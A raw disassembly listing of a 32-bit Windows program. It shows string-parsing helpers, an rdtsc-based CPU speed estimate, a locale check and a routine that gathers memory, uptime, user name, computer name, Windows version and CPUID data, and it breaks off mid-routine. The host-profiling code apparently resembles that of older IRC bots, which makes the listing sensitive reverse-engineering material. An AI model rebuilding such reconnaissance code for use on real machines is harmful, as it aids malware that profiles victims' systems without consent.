mov [eax], cl
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407CCD
cmp [ebp+arg_8], 0
jz short loc_407CCB
cmp [ebp+var_8], 0
jz short loc_407CCB
loc_407C9C: ; CODE XREF: sub_407C2C:loc_407CC9�j
push 1
pop eax
test eax, eax
jz short loc_407CCB
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
and byte ptr [eax], 0
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407CC7
cmp [ebp+var_8], 0
jnz short loc_407CC9
loc_407CC7: ; CODE XREF: sub_407C2C+93�j
jmp short loc_407CCB
; ---------------------------------------------------------------------------
loc_407CC9: ; CODE XREF: sub_407C2C+99�j
jmp short loc_407C9C
; ---------------------------------------------------------------------------
loc_407CCB: ; CODE XREF: sub_407C2C+68�j
; sub_407C2C+6E�j ...
jmp short locret_407CD2
; ---------------------------------------------------------------------------
loc_407CCD: ; CODE XREF: sub_407C2C+62�j
jmp loc_407C42
; ---------------------------------------------------------------------------
locret_407CD2: ; CODE XREF: sub_407C2C:loc_407CCB�j
leave
retn
sub_407C2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407CD4 proc near ; CODE XREF: sub_407D42+5F�p
; sub_407D42+79�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_407CE5
; ---------------------------------------------------------------------------
loc_407CDE: ; CODE XREF: sub_407CD4+68�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407CE5: ; CODE XREF: sub_407CD4+8�j
cmp [ebp+var_4], 4
jge short loc_407D3E
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 2Eh
jnz short loc_407D0E
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
jmp short locret_407D40
; ---------------------------------------------------------------------------
loc_407D0E: ; CODE XREF: sub_407CD4+23�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407D2C
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
jmp short locret_407D40
; ---------------------------------------------------------------------------
loc_407D2C: ; CODE XREF: sub_407CD4+45�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx]
mov [eax], cl
jmp short loc_407CDE
; ---------------------------------------------------------------------------
loc_407D3E: ; CODE XREF: sub_407CD4+15�j
xor eax, eax
locret_407D40: ; CODE XREF: sub_407CD4+38�j
; sub_407CD4+56�j
leave
retn
sub_407CD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407D42 proc near ; CODE XREF: sub_407F3D+19�p
; sub_407F3D+3F�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
push 2Eh
push [ebp+arg_0]
call sub_4078E6
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 3
jle short loc_407D63
xor eax, eax
jmp locret_407E0A
; ---------------------------------------------------------------------------
loc_407D63: ; CODE XREF: sub_407D42+18�j
mov eax, [ebp+arg_10]
and byte ptr [eax], 0
mov eax, [ebp+arg_C]
and byte ptr [eax], 0
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
mov eax, [ebp+arg_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_407DE9
cmp [ebp+var_8], 1
jz short loc_407DCF
cmp [ebp+var_8], 2
jz short loc_407DB5
cmp [ebp+var_8], 3
jz short loc_407D9B
jmp short loc_407E08
; ---------------------------------------------------------------------------
loc_407D9B: ; CODE XREF: sub_407D42+55�j
push [ebp+arg_0]
push [ebp+arg_4]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DB5
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DB5: ; CODE XREF: sub_407D42+4F�j
; sub_407D42+6D�j
push [ebp+arg_0]
push [ebp+arg_8]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DCF
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DCF: ; CODE XREF: sub_407D42+49�j
; sub_407D42+87�j
push [ebp+arg_0]
push [ebp+arg_C]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DE9
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DE9: ; CODE XREF: sub_407D42+43�j
; sub_407D42+A1�j
push [ebp+arg_0]
push [ebp+arg_10]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407E03
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407E03: ; CODE XREF: sub_407D42+BB�j
push 1
pop eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407E08: ; CODE XREF: sub_407D42+57�j
xor eax, eax
locret_407E0A: ; CODE XREF: sub_407D42+1C�j
; sub_407D42+71�j ...
leave
retn
sub_407D42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407E0C proc near ; CODE XREF: sub_407F3D+A3�p
; sub_407F3D+C1�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 72h
jnz short loc_407E4A
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz short loc_407E4A
push 0Ah
push [ebp+arg_C]
push 0FFh
push 0
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
mov eax, [ebp+arg_10]
jmp locret_407F3B
; ---------------------------------------------------------------------------
loc_407E4A: ; CODE XREF: sub_407E0C+D�j
; sub_407E0C+18�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 73h
jz short loc_407E64
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 69h
jnz loc_407EF9
loc_407E64: ; CODE XREF: sub_407E0C+47�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz loc_407EF9
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407EB3
cmp [ebp+arg_10], 0
jz short loc_407EB3
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
movzx eax, al
inc eax
mov [ebp+var_4], al
push 0Ah
push [ebp+arg_C]
movzx eax, [ebp+var_4]
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
movzx eax, [ebp+var_4]
neg eax
sbb eax, eax
inc eax
jmp locret_407F3B
; ---------------------------------------------------------------------------
loc_407EB3: ; CODE XREF: sub_407E0C+6F�j
; sub_407E0C+75�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407ECC
push [ebp+arg_0]
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_407EF5
; ---------------------------------------------------------------------------
loc_407ECC: ; CODE XREF: sub_407E0C+AF�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 69h
jnz short loc_407EE8
push offset dword_418F50
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_407EF5
; ---------------------------------------------------------------------------
loc_407EE8: ; CODE XREF: sub_407E0C+C9�j
push [ebp+arg_8]
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_407EF5: ; CODE XREF: sub_407E0C+BE�j
; sub_407E0C+DA�j
xor eax, eax
jmp short locret_407F3B
; ---------------------------------------------------------------------------
loc_407EF9: ; CODE XREF: sub_407E0C+52�j
; sub_407E0C+61�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407F12
push [ebp+arg_4]
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_407F38
; ---------------------------------------------------------------------------
loc_407F12: ; CODE XREF: sub_407E0C+F5�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407F2B
push [ebp+arg_0]
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_407F38
; ---------------------------------------------------------------------------
loc_407F2B: ; CODE XREF: sub_407E0C+10E�j
push [ebp+arg_8]
push [ebp+arg_C]
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_407F38: ; CODE XREF: sub_407E0C+104�j
; sub_407E0C+11D�j
mov eax, [ebp+arg_10]
locret_407F3B: ; CODE XREF: sub_407E0C+39�j
; sub_407E0C+A2�j ...
leave
retn
sub_407E0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F3D proc near ; CODE XREF: sub_41349C+192�p
; sub_41349C+3DA�p
var_44 = byte ptr -44h
var_40 = byte ptr -40h
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_2C = byte ptr -2Ch
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 44h
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_0]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407F69
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407F69: ; CODE XREF: sub_407F3D+23�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_40]
push eax
push [ebp+arg_4]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407F8F
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407F8F: ; CODE XREF: sub_407F3D+49�j
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_1C]
push eax
push offset dword_41EF48
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407FB7
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407FB7: ; CODE XREF: sub_407F3D+71�j
movsx eax, [ebp+var_14]
test eax, eax
jnz short loc_407FC6
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407FC6: ; CODE XREF: sub_407F3D+80�j
mov [ebp+var_18], 1
push [ebp+var_18]
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_44]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_20]
push eax
push offset dword_418F54
push [ebp+arg_8]
call sub_416B5E ; sprintf
add esp, 18h
push 1
pop eax
locret_408068: ; CODE XREF: sub_407F3D+27�j
; sub_407F3D+4D�j ...
leave
retn
sub_407F3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40806A proc near ; CODE XREF: sub_41349C+12A�p
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_408096
xor eax, eax
jmp locret_40813A
; ---------------------------------------------------------------------------
loc_408096: ; CODE XREF: sub_40806A+23�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push offset dword_41EF48
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_4080BB
xor eax, eax
jmp short locret_40813A
; ---------------------------------------------------------------------------
loc_4080BB: ; CODE XREF: sub_40806A+4B�j
movsx eax, [ebp+var_18]
test eax, eax
jnz short loc_4080D2
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_4080D2: ; CODE XREF: sub_40806A+57�j
movsx eax, [ebp+var_1C]
test eax, eax
jnz short loc_4080E9
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_1C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_4080E9: ; CODE XREF: sub_40806A+6E�j
movsx eax, [ebp+var_20]
test eax, eax
jnz short loc_408100
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_20]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_408100: ; CODE XREF: sub_40806A+85�j
movsx eax, [ebp+var_4]
test eax, eax
jnz short loc_408117
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_408117: ; CODE XREF: sub_40806A+9C�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push offset dword_418F54
push [ebp+arg_0]
call sub_416B5E ; sprintf
add esp, 18h
push 1
pop eax
locret_40813A: ; CODE XREF: sub_40806A+27�j
; sub_40806A+4F�j
leave
retn
sub_40806A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40813C proc near ; CODE XREF: sub_407928+54�p
; sub_407928+9D�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jz short loc_408150
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_0]
mov [eax], ecx
loc_408150: ; CODE XREF: sub_40813C+A�j
mov eax, [ebp+arg_8]
mov eax, [eax]
mov [ebp+var_8], eax
jmp short loc_408161
; ---------------------------------------------------------------------------
loc_40815A: ; CODE XREF: sub_40813C:loc_4081A0�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_408161: ; CODE XREF: sub_40813C+1C�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4081A2
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_408171: ; CODE XREF: sub_40813C+56�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_408194
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_408194
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp short loc_408171
; ---------------------------------------------------------------------------
loc_408194: ; CODE XREF: sub_40813C+3D�j
; sub_40813C+4D�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4081A0
jmp short loc_4081A2
; ---------------------------------------------------------------------------
loc_4081A0: ; CODE XREF: sub_40813C+60�j
jmp short loc_40815A
; ---------------------------------------------------------------------------
loc_4081A2: ; CODE XREF: sub_40813C+2D�j
; sub_40813C+62�j
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_4081AE: ; CODE XREF: sub_40813C:loc_4081F5�j
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4081F7
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_4081D7
mov eax, [ebp+var_C]
and byte ptr [eax], 0
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_4081F7
; ---------------------------------------------------------------------------
loc_4081D7: ; CODE XREF: sub_40813C+8A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4081F5
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
loc_4081F5: ; CODE XREF: sub_40813C+AA�j
jmp short loc_4081AE
; ---------------------------------------------------------------------------
loc_4081F7: ; CODE XREF: sub_40813C+7A�j
; sub_40813C+99�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
mov [eax], ecx
mov eax, [ebp+var_8]
sub eax, [ebp+var_C]
neg eax
sbb eax, eax
and eax, [ebp+var_8]
leave
retn
sub_40813C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40820E proc near ; CODE XREF: sub_40821B:loc_408221�p
; sub_40821B+1C�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
rdtsc
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40820E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40821B proc near ; CODE XREF: sub_4083AD+3A4�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20h
loc_408221: ; CODE XREF: sub_40821B+4A�j
; sub_40821B+55�j
call sub_40820E
mov [ebp+var_20], eax
mov [ebp+var_1C], edx
push 3E8h
call dword_41709C ; Sleep
call sub_40820E
sub eax, [ebp+var_20]
sbb edx, [ebp+var_1C]
push 0
push 186A0h
push edx
push eax
call sub_416C90
push 0
push 0Ah
push edx
push eax
call sub_416C90
mov [ebp+var_8], eax
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
ja short loc_408221
jb short loc_408272
cmp [ebp+var_8], 0F4240h
ja short loc_408221
loc_408272: ; CODE XREF: sub_40821B+4C�j
push 0
push 64h
push [ebp+var_4]
push [ebp+var_8]
call sub_416C10
mov [ebp+var_18], eax
mov [ebp+var_14], edx
mov [ebp+var_10], 64h
and [ebp+var_C], 0
cmp [ebp+var_14], 0
ja short loc_4082AB
jb short loc_4082A0
cmp [ebp+var_18], 50h
jnb short loc_4082AB
loc_4082A0: ; CODE XREF: sub_40821B+7D�j
mov [ebp+var_10], 4Bh
and [ebp+var_C], 0
loc_4082AB: ; CODE XREF: sub_40821B+7B�j
; sub_40821B+83�j
cmp [ebp+var_14], 0
ja short loc_4082C4
jb short loc_4082B9
cmp [ebp+var_18], 47h
jnb short loc_4082C4
loc_4082B9: ; CODE XREF: sub_40821B+96�j
mov [ebp+var_10], 42h
and [ebp+var_C], 0
loc_4082C4: ; CODE XREF: sub_40821B+94�j
; sub_40821B+9C�j
cmp [ebp+var_14], 0
ja short loc_4082DD
jb short loc_4082D2
cmp [ebp+var_18], 37h
jnb short loc_4082DD
loc_4082D2: ; CODE XREF: sub_40821B+AF�j
mov [ebp+var_10], 32h
and [ebp+var_C], 0
loc_4082DD: ; CODE XREF: sub_40821B+AD�j
; sub_40821B+B5�j
cmp [ebp+var_14], 0
ja short loc_4082F6
jb short loc_4082EB
cmp [ebp+var_18], 26h
jnb short loc_4082F6
loc_4082EB: ; CODE XREF: sub_40821B+C8�j
mov [ebp+var_10], 21h
and [ebp+var_C], 0
loc_4082F6: ; CODE XREF: sub_40821B+C6�j
; sub_40821B+CE�j
cmp [ebp+var_14], 0
ja short loc_40830F
jb short loc_408304
cmp [ebp+var_18], 1Eh
jnb short loc_40830F
loc_408304: ; CODE XREF: sub_40821B+E1�j
mov [ebp+var_10], 19h
and [ebp+var_C], 0
loc_40830F: ; CODE XREF: sub_40821B+DF�j
; sub_40821B+E7�j
cmp [ebp+var_14], 0
ja short loc_408325
jb short loc_40831D
cmp [ebp+var_18], 0Ah
jnb short loc_408325
loc_40831D: ; CODE XREF: sub_40821B+FA�j
and [ebp+var_10], 0
and [ebp+var_C], 0
loc_408325: ; CODE XREF: sub_40821B+F8�j
; sub_40821B+100�j
mov eax, [ebp+var_8]
sub eax, [ebp+var_18]
mov ecx, [ebp+var_4]
sbb ecx, [ebp+var_14]
add eax, [ebp+var_10]
adc ecx, [ebp+var_C]
mov [ebp+var_8], eax
mov [ebp+var_4], ecx
mov eax, [ebp+var_8]
leave
retn
sub_40821B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408342 proc near ; CODE XREF: sub_40D043+156�p
; sub_40D871+30C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1Fh
push [ebp+arg_0]
push 7
push 400h
call dword_417034 ; GetLocaleInfoA
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
and byte ptr [eax+3], 0
cmp [ebp+var_4], 0
jz short loc_408381
push offset off_419100
push [ebp+arg_0]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4083A8
loc_408381: ; CODE XREF: sub_408342+2A�j
push 1Fh
push [ebp+arg_0]
push 7
push 800h
call dword_417034 ; GetLocaleInfoA
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
and byte ptr [eax+3], 0
mov eax, [ebp+var_4]
jmp short locret_4083AB
; ---------------------------------------------------------------------------
loc_4083A8: ; CODE XREF: sub_408342+3D�j
push 1
pop eax
locret_4083AB: ; CODE XREF: sub_408342+64�j
leave
retn
sub_408342 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4083AD proc near ; DATA XREF: sub_4087C4+35�o
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = dword ptr -748h
var_744 = dword ptr -744h
var_740 = dword ptr -740h
var_73C = dword ptr -73Ch
var_738 = dword ptr -738h
var_734 = byte ptr -734h
var_72C = dword ptr -72Ch
var_728 = dword ptr -728h
var_714 = dword ptr -714h
var_710 = dword ptr -710h
var_70C = dword ptr -70Ch
var_708 = byte ptr -708h
var_6F0 = dword ptr -6F0h
var_6EC = dword ptr -6ECh
var_6E8 = dword ptr -6E8h
var_6E4 = dword ptr -6E4h
var_6E0 = byte ptr -6E0h
var_6D0 = dword ptr -6D0h
var_6CC = dword ptr -6CCh
var_6C8 = byte ptr -6C8h
var_524 = dword ptr -524h
var_520 = dword ptr -520h
var_51C = dword ptr -51Ch
var_518 = dword ptr -518h
var_514 = dword ptr -514h
var_510 = dword ptr -510h
var_50C = byte ptr -50Ch
var_48C = dword ptr -48Ch
var_488 = dword ptr -488h
var_484 = dword ptr -484h
var_480 = dword ptr -480h
var_47C = byte ptr -47Ch
var_409 = byte ptr -409h
var_408 = byte ptr -408h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 750h
push ebx
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_6CC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_734]
push eax
call dword_4170C4 ; GlobalMemoryStatus
mov eax, [ebp+var_72C]
add eax, 100000h
shr eax, 14h
mov [ebp+var_6F0], eax
mov eax, [ebp+var_728]
add eax, 100000h
shr eax, 14h
mov [ebp+var_738], eax
call sub_4092A4
mov [ebp+var_714], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_6E8], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_524], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_6E4], eax
mov [ebp+var_8], 15h
mov [ebp+var_6D0], 10h
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_708]
push eax
call dword_417018 ; GetUserNameA
lea eax, [ebp+var_6D0]
push eax
lea eax, [ebp+var_6E0]
push eax
call dword_417078 ; GetComputerNameA
mov [ebp+var_520], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_51C]
rep stosd
lea eax, [ebp+var_520]
push eax
call dword_417030 ; GetVersionExA
mov [ebp+var_48C], offset a? ; "?"
mov [ebp+var_710], offset aNoSp ; "no SP"
cmp [ebp+var_51C], 4
jnz short loc_408522
cmp [ebp+var_518], 0
jnz short loc_408522
cmp [ebp+var_510], 1
jnz short loc_40850A
mov [ebp+var_48C], offset a95 ; "95"
loc_40850A: ; CODE XREF: sub_4083AD+151�j
cmp [ebp+var_510], 2
jnz short loc_40851D
mov [ebp+var_48C], offset aNt ; "NT"
loc_40851D: ; CODE XREF: sub_4083AD+164�j
jmp loc_4085B6
; ---------------------------------------------------------------------------
loc_408522: ; CODE XREF: sub_4083AD+13F�j
; sub_4083AD+148�j
cmp [ebp+var_51C], 4
jnz short loc_408540
cmp [ebp+var_518], 0Ah
jnz short loc_408540
mov [ebp+var_48C], offset a98 ; "98"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_408540: ; CODE XREF: sub_4083AD+17C�j
; sub_4083AD+185�j
cmp [ebp+var_51C], 4
jnz short loc_40855E
cmp [ebp+var_518], 5Ah
jnz short loc_40855E
mov [ebp+var_48C], offset aMe ; "ME"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40855E: ; CODE XREF: sub_4083AD+19A�j
; sub_4083AD+1A3�j
cmp [ebp+var_51C], 5
jnz short loc_40857C
cmp [ebp+var_518], 0
jnz short loc_40857C
mov [ebp+var_48C], offset a2000 ; "2000"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40857C: ; CODE XREF: sub_4083AD+1B8�j
; sub_4083AD+1C1�j
cmp [ebp+var_51C], 5
jnz short loc_40859A
cmp [ebp+var_518], 1
jnz short loc_40859A
mov [ebp+var_48C], offset aXp ; "XP"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40859A: ; CODE XREF: sub_4083AD+1D6�j
; sub_4083AD+1DF�j
cmp [ebp+var_51C], 5
jnz short loc_4085B6
cmp [ebp+var_518], 2
jnz short loc_4085B6
mov [ebp+var_48C], offset a2003 ; "2003"
loc_4085B6: ; CODE XREF: sub_4083AD:loc_40851D�j
; sub_4083AD+191�j ...
cmp [ebp+var_510], 2
jnz short loc_4085D6
movsx eax, [ebp+var_50C]
test eax, eax
jz short loc_4085D6
lea eax, [ebp+var_50C]
mov [ebp+var_710], eax
loc_4085D6: ; CODE XREF: sub_4083AD+210�j
; sub_4083AD+21B�j
call sub_40435B
test eax, eax
jz short loc_4085EB
mov [ebp+var_744], offset aYes ; "Yes"
jmp short loc_4085F5
; ---------------------------------------------------------------------------
loc_4085EB: ; CODE XREF: sub_4083AD+230�j
mov [ebp+var_744], offset aNo ; "No"
loc_4085F5: ; CODE XREF: sub_4083AD+23C�j
mov eax, [ebp+var_744]
mov [ebp+var_4], eax
and [ebp+var_47C], 0
and [ebp+var_409], 0
xor eax, eax
cpuid
mov [ebp+var_488], ebx
mov [ebp+var_484], edx
mov [ebp+var_480], ecx
lea eax, [ebp+var_488]
mov [ebp+var_6EC], eax
